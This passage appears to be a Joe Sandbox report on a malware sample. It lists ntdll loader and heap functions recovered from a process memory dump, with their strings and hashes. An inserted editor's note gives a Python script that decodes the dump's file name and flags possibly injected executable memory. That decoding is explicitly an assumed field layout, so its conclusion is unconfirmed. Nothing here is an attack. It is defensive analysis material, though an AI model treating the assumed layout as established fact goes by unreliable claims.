                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: b65cb8c82c0b97281abf57fed79536f98b5804b17eaf2f8bab169cd14db26d67
                                                • Instruction ID: f393b7e476e906dac97b586d94e9d7f9c492b23a73b32a5d3ee6d1dad5593dfe
                                                • Opcode Fuzzy Hash: b65cb8c82c0b97281abf57fed79536f98b5804b17eaf2f8bab169cd14db26d67
                                                • Instruction Fuzzy Hash: 57D1F1B1520286DFDB2ADF68D441AAEBBF1FF89704F088049F6559B352D734D941CB28
                                                Strings
                                                • VerifierDlls, xrefs: 01208CBD
                                                • AVRF: -*- final list of providers -*- , xrefs: 01208B8F
                                                • VerifierDebug, xrefs: 01208CA5
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01208A3D
                                                • HandleTraces, xrefs: 01208C8F
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01208A67
                                                • VerifierFlags, xrefs: 01208C50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 2fd1fc40083df13d619f2f4df16ae287401513d78e080f5cc95f92f95e4cbb1d
                                                • Instruction ID: 49d5f4fc6ca58f62a4a41a80a8454a15d50be7edddf7cdbca3ce92373b589b73
                                                • Opcode Fuzzy Hash: 2fd1fc40083df13d619f2f4df16ae287401513d78e080f5cc95f92f95e4cbb1d
                                                • Instruction Fuzzy Hash: 47913672E65712AFD727EF28D881B2BBBA4AB54714F050718FA45AB2C2D7709C40CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                • API String ID: 0-1109411897
                                                • Opcode ID: b14e18fe1f9260537033ec17ca5d3b0b2c38744c5f63004738f9b098b6323a64
                                                • Instruction ID: ef452a8c5471467c54e062ae9a24deebee6623112f974cf3a881fa3eb54e7ab4
                                                • Opcode Fuzzy Hash: b14e18fe1f9260537033ec17ca5d3b0b2c38744c5f63004738f9b098b6323a64
                                                • Instruction Fuzzy Hash: C6A24B74E05A2ACFDB68DF58CC887A9BBB5AF49304F1482E9D50DA7650DB309E85CF40
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 50c4d5472befd5b76d0bfbc7824efbf0bb33ce88676d81e626c06886c7b4571f
                                                • Instruction ID: c0c71adb3fdd3f0d5c746d9dcfbd6db1b3cca44b7823fc472d5ffe5d4604578b
                                                • Opcode Fuzzy Hash: 50c4d5472befd5b76d0bfbc7824efbf0bb33ce88676d81e626c06886c7b4571f
                                                • Instruction Fuzzy Hash: B1912971B017159BEB3DDF58E888BEBBBA5FB61B18F04012CE61067685D7789801C7D1
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011D9A11, 011D9A3A
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 011D9A01
                                                • LdrpInitShimEngine, xrefs: 011D99F4, 011D9A07, 011D9A30
                                                • apphelp.dll, xrefs: 01176496
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011D99ED
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 011D9A2A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: 107d10f8ed04026d079f1fb483ed1838f3f9a008212547cca3635457a5374b8b
                                                • Instruction ID: 963845759e771eed0a310c0f94e73912ac3e5db8ab799989957c892295c9ee6e
                                                • Opcode Fuzzy Hash: 107d10f8ed04026d079f1fb483ed1838f3f9a008212547cca3635457a5374b8b
                                                • Instruction Fuzzy Hash: 4A51A2722087059FE72DDF24D885BABB7E8FB84648F01091DF5959B260E730E944DB93
                                                Strings
                                                • SXS: %s() passed the empty activation context, xrefs: 011F2165
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011F2180
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011F21BF
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011F219F
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011F2178
                                                • RtlGetAssemblyStorageRoot, xrefs: 011F2160, 011F219A, 011F21BA
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: 1696ded0a353fc0a9281c7449486c4d236707085e0a65f19d74334275417b7e2
                                                • Instruction ID: 4415c7b22a8c4ccb62b3d0607b5d546a2758e9d0a383b513cd81bc889e4be027
                                                • Opcode Fuzzy Hash: 1696ded0a353fc0a9281c7449486c4d236707085e0a65f19d74334275417b7e2
                                                • Instruction Fuzzy Hash: 7F313536B402117BE72D8A9A8C81FAA7A6CDB65A54F09015DFB04A7180D370EE01C6A5
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011BC6C3
                                                • LdrpInitializeImportRedirection, xrefs: 011F8177, 011F81EB
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 011F8181, 011F81F5
                                                • LdrpInitializeProcess, xrefs: 011BC6C4
                                                • Loading import redirection DLL: '%wZ', xrefs: 011F8170
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 011F81E5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: 0db956655d65192168778359e59b0d630eee00950aa2bb93463ee210f2aa42e2
                                                • Instruction ID: 35fb550e4bae368fc01d7aa37d88bb6b77f4582e4c95e7b21df292c9eec61507
                                                • Opcode Fuzzy Hash: 0db956655d65192168778359e59b0d630eee00950aa2bb93463ee210f2aa42e2
                                                • Instruction Fuzzy Hash: 9331E2716487469FD32CEF28DC86E6BBB94AF94B14F05055CF944AB291E720EC04C7A2
                                                APIs
                                                  • Part of subcall function 011C2DF0: LdrInitializeThunk.NTDLL ref: 011C2DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0D74
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                • Opcode ID: 5b6b9f4738d766b9e32f16d1d07d0f274482589ba70ee30ee24d95d21dd4e803
                                                • Instruction ID: 1c27d4d50ca3d77073082a8f07f42396e45fc302bf54bd1a9f4fb7e0231927a5
                                                • Opcode Fuzzy Hash: 5b6b9f4738d766b9e32f16d1d07d0f274482589ba70ee30ee24d95d21dd4e803
                                                • Instruction Fuzzy Hash: 49426C75900719DFDB29CF28C880BAAB7F4BF58704F1445ADE989DB241E770AA84CF61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: 4f85107bddfe685adad2cb23eeefb04528bc3e70748b8c950c9b28edaf531594
                                                • Instruction ID: 7175949b0432467fc9d52810a84c3c5a49bce24f10423afd0bf47dd69258de7f
                                                • Opcode Fuzzy Hash: 4f85107bddfe685adad2cb23eeefb04528bc3e70748b8c950c9b28edaf531594
                                                • Instruction Fuzzy Hash: B5C18B74108782CFDB19EF58D044B6AB7E4BF84708F04896AF9958B251E738DA49CF63
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011B8421
                                                • LdrpInitializeProcess, xrefs: 011B8422
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 011B855E
                                                • @, xrefs: 011B8591
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: 21caa39026ddaf263a737bfec87e1b551d5952c3d9c5a32139d4d07f872b01d3
                                                • Instruction ID: 29b824c101b1f21a9548b0cd655751a6ed514fcb9c113227d99f0e9a1d4111da
                                                • Opcode Fuzzy Hash: 21caa39026ddaf263a737bfec87e1b551d5952c3d9c5a32139d4d07f872b01d3
                                                • Instruction Fuzzy Hash: B3917D71508345AFD72ADF65CC80FABBAECBF94B48F40092EFA8492151E734D944CB62
                                                Strings
                                                • SXS: %s() passed the empty activation context, xrefs: 011F21DE
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011F21D9, 011F22B1
                                                • .Local, xrefs: 011B28D8
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011F22B6
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: 66c523b4120332fcadb96d7aced21000a8db338d8eef805ade98caad223a0c9a
                                                • Instruction ID: e9bf1a69f7c796f6f515268de338635f10f3000d98078c4417c7b74926841f69
                                                • Opcode Fuzzy Hash: 66c523b4120332fcadb96d7aced21000a8db338d8eef805ade98caad223a0c9a
                                                • Instruction Fuzzy Hash: ECA1DF35900229DBDB29CF68C8C8BE9B7B1BF58354F1541EAD908A7251E730EE85CF90
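Editor's note on the "Source File" line that repeats through these records. The dump name encodes where in process 9 the code carrying these ntdll loader and heap strings (LdrpInitializeProcess, minkernel\ntdll\ldrinit.c, HEAP[%wZ]) was found. The script below is an added example, not Joe Sandbox code, and its reading of the name is an assumption: the fourth field equals the "Offset: 01150000" printed beside it, and the next three fields are interpreted as the Windows MEMORY_BASIC_INFORMATION Protect, State and Type values (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE). Under that reading the region is committed private memory with execute and write permission that nonetheless parses as a PE ("based on PE: true"), which is not how the OS loader maps a DLL (that would be MEM_IMAGE with a read-execute .text section); it is the check an analyst should make before treating these functions as the process's legitimately loaded ntdll.

```python
"""Decode the 'Source File' name of a Joe Sandbox memory dump (.sdmp) and
cross-check it against the Offset / based-on-PE fields printed beside it.

Added example for this report section, not Joe Sandbox code.  The field
layout is an ASSUMPTION: field 4 is taken as the region base (it equals the
printed Offset) and fields 5-7 as MEMORY_BASIC_INFORMATION Protect / State /
Type (winnt.h constants).  The other fields are carried through undecoded.
"""
from dataclasses import dataclass
import re

# winnt.h memory constants, used to decode fields 5-7 under the assumption above.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}
EXECUTABLE = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE = 0x04 | 0x08 | 0x40 | 0x80

_NAME = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<pass_>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<mtype>[0-9A-Fa-f]{8})\."
    r"(?P<tail>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int   # assumed: matches the _9_ in hcaresult_9_2_1150000_...
    dump_pass: int       # assumed: matches the _2_ in the same snapshot name
    dump_id: str         # kept as-is; its meaning is not documented on the page
    base: int
    protect: int
    state: int
    mem_type: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect:x}")

    @property
    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:x}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:x}")

    def is_writable_executable(self) -> bool:
        p = self.protect & 0xFF
        return bool(p & EXECUTABLE) and bool(p & WRITABLE)


def parse_sdmp_name(name: str) -> DumpRegion:
    m = _NAME.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16),
        dump_pass=int(m["pass_"], 16),
        dump_id=m["dump_id"],
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        state=int(m["state"], 16),
        mem_type=int(m["mtype"], 16),
    )


def assess(name: str, printed_offset: int, based_on_pe: bool) -> dict:
    """Check the name against the report's printed Offset and say why the
    region deserves attention.  A module mapped by the OS loader lives in
    MEM_IMAGE memory with a read-execute .text section; a PE that parses
    out of committed MEM_PRIVATE memory with write+execute protection was
    put there by the process itself (manually mapped or injected)."""
    r = parse_sdmp_name(name)
    findings = []
    if r.state != 0x1000:
        findings.append(f"region not committed ({r.state_name})")
    if r.is_writable_executable():
        findings.append(f"writable+executable ({r.protect_name})")
    if based_on_pe and r.mem_type != 0x1000000:
        findings.append(f"PE image in {r.type_name} memory, not MEM_IMAGE")
    return {
        "region": r,
        "offset_matches": r.base == printed_offset,
        "suspicious": bool(findings),
        "findings": findings,
    }


# Constructed input: the Source File name repeated through this section.
SAMPLE = "00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp"

if __name__ == "__main__":
    result = assess(SAMPLE, printed_offset=0x01150000, based_on_pe=True)
    r = result["region"]
    print(f"proc {r.process_index} pass {r.dump_pass} base 0x{r.base:08x} "
          f"{r.protect_name} {r.state_name} {r.type_name}")
    for finding in result["findings"]:
        print(" -", finding)
```

Run against the name above it reports process 9, pass 2, base 0x01150000, PAGE_EXECUTE_READWRITE / MEM_COMMIT / MEM_PRIVATE, and two findings (writable+executable; PE image in private memory). If your own dumps use a different field order, adjust the regex groups rather than the constants; the winnt.h values are fixed, the name layout is the assumption.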
                                                Strings
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 011F3437
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 011F342A
                                                • RtlDeactivateActivationContext, xrefs: 011F3425, 011F3432, 011F3451
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 011F3456
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                • Opcode ID: 84aeaa38f0717c0cd0292cccfe01baf70c3b6dd1c68fc2068ff7e04d741f3aee
                                                • Instruction ID: d6bdc896f53c0ed33cb251a434b5efac00cc78a2bf6d7cf140db417af16ec7bf
                                                • Opcode Fuzzy Hash: 84aeaa38f0717c0cd0292cccfe01baf70c3b6dd1c68fc2068ff7e04d741f3aee
                                                • Instruction Fuzzy Hash: 1A613632650B129FD72ECF1DC881B6AB7E5FF90B50F15851DEA669B682C730E801CB91
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011E10AE
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011E106B
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011E1028
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011E0FE5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: d7c69823e93d80c2d1ba743bf098fa165b932c3316f8811b42c323509e13d361
                                                • Instruction ID: c3c8c9436ce7094e46431aa1c17a3c33b74f542a25dc53193e95c5facab5147b
                                                • Opcode Fuzzy Hash: d7c69823e93d80c2d1ba743bf098fa165b932c3316f8811b42c323509e13d361
                                                • Instruction Fuzzy Hash: EF71D2B19047059FCB25EF58C884B9B7FA8AF54BA4F404568F9488B286D734D588CFE2
                                                Strings
                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 011F365C
                                                • LdrpFindDllActivationContext, xrefs: 011F3636, 011F3662
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 011F3640, 011F366C
                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011F362F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 0-3779518884
                                                • Opcode ID: abe78279f785403e62e63d7723a2cf1786c3925c9d025d44b01873546728cfe4
                                                • Instruction ID: 0ac70b6a84d624bd359a44c25405e6d8a032159857fab0b019436a8c531750f9
                                                • Opcode Fuzzy Hash: abe78279f785403e62e63d7723a2cf1786c3925c9d025d44b01873546728cfe4
                                                • Instruction Fuzzy Hash: 5B315C32A102119AEF3EDB0CD8C8BFE76A8BB21654F07C029D61B57963D7A09D80C7C5
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011EA9A2
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011EA992
                                                • apphelp.dll, xrefs: 011A2462
                                                • LdrpDynamicShimModule, xrefs: 011EA998
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: 14c1b4192118e3f7d72cafd7f1b7c80ef333b78b568ed7980c51d757cbf8db35
                                                • Instruction ID: 8a161be0aee56fd446110606256b3592e70686c364ed37525dae2eeccc39e5e2
                                                • Opcode Fuzzy Hash: 14c1b4192118e3f7d72cafd7f1b7c80ef333b78b568ed7980c51d757cbf8db35
                                                • Instruction Fuzzy Hash: 29314675600701ABEB3DDF99B88DAABBBF4FF80B14F160019E901A7245D7B09881CB80
                                                Strings
                                                • HEAP: , xrefs: 01193264
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0119327D
                                                • HEAP[%wZ]: , xrefs: 01193255
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                • Opcode ID: 1b254b6f539d2257e625b81e9f6d13a9b35e83b487a9d7fbb11ea5179445e77b
                                                • Instruction ID: 126feecf34a8544c5287ccbefab093118a7229315e5f6a83ec50e792ee075039
                                                • Opcode Fuzzy Hash: 1b254b6f539d2257e625b81e9f6d13a9b35e83b487a9d7fbb11ea5179445e77b
                                                • Instruction Fuzzy Hash: F992CD71A042499FEF29CFA8C444BAEBBF1FF48304F188059E86AAB351D735A941CF51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 036711e0473463e2ebb5db6b0c78c199b0dd2feae36ea0f1f0c1502fbc56ac39
                                                • Instruction ID: da9e3102f34fac15eed896de9ddea1fda5d4de7b29e7e460f52faa6e590c14cd
                                                • Opcode Fuzzy Hash: 036711e0473463e2ebb5db6b0c78c199b0dd2feae36ea0f1f0c1502fbc56ac39
                                                • Instruction Fuzzy Hash: F3F19E34A00A06DFEB1DCFA8C894B6AB7FAFF49704F144168E5269B341D734E981CB91
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                • Opcode ID: 587eab3430aad9a93747f94c10798e13419bb59731da6a8838135467c1a1a334
                                                • Instruction ID: ffcbc9117ef546dcb11f41ce3603ea55a3f5bfe61cf1c97fd908c520b9cfb03b
                                                • Opcode Fuzzy Hash: 587eab3430aad9a93747f94c10798e13419bb59731da6a8838135467c1a1a334
                                                • Instruction Fuzzy Hash: 41C2C0756087418FEB2DCF28C880BABBBE5AF88714F45892DF989C7241D735D905CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 3ec47ea318d535e989cb894415870fe1b91ce77bcdd706703152e4bc0d78ea02
                                                • Instruction ID: 6e365bfc94d573ffcffcf0db11ff74cd917d50f32b4543d254b6127dafb1d1cf
                                                • Opcode Fuzzy Hash: 3ec47ea318d535e989cb894415870fe1b91ce77bcdd706703152e4bc0d78ea02
                                                • Instruction Fuzzy Hash: BAA190719112299BDB39DF68CC88BEEB7B8EF44714F0005E9E908A7250DB359E84CF90
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011EA121
                                                • Failed to allocated memory for shimmed module list, xrefs: 011EA10F
                                                • LdrpCheckModule, xrefs: 011EA117
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                • Opcode ID: ea8192778b4058e8ec40b28369acd0515d2fc4aaf82abcdd247778621e4aaa8b
                                                • Instruction ID: 833523bc7534be3764203cd2499ee8dcceea8add612d9892285eaf6778609081
                                                • Opcode Fuzzy Hash: ea8192778b4058e8ec40b28369acd0515d2fc4aaf82abcdd247778621e4aaa8b
                                                • Instruction Fuzzy Hash: 9471DE74A006059FDB2DDFA8D988ABEBBF4FF88608F55406DE802A7255E734AD41CB41
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
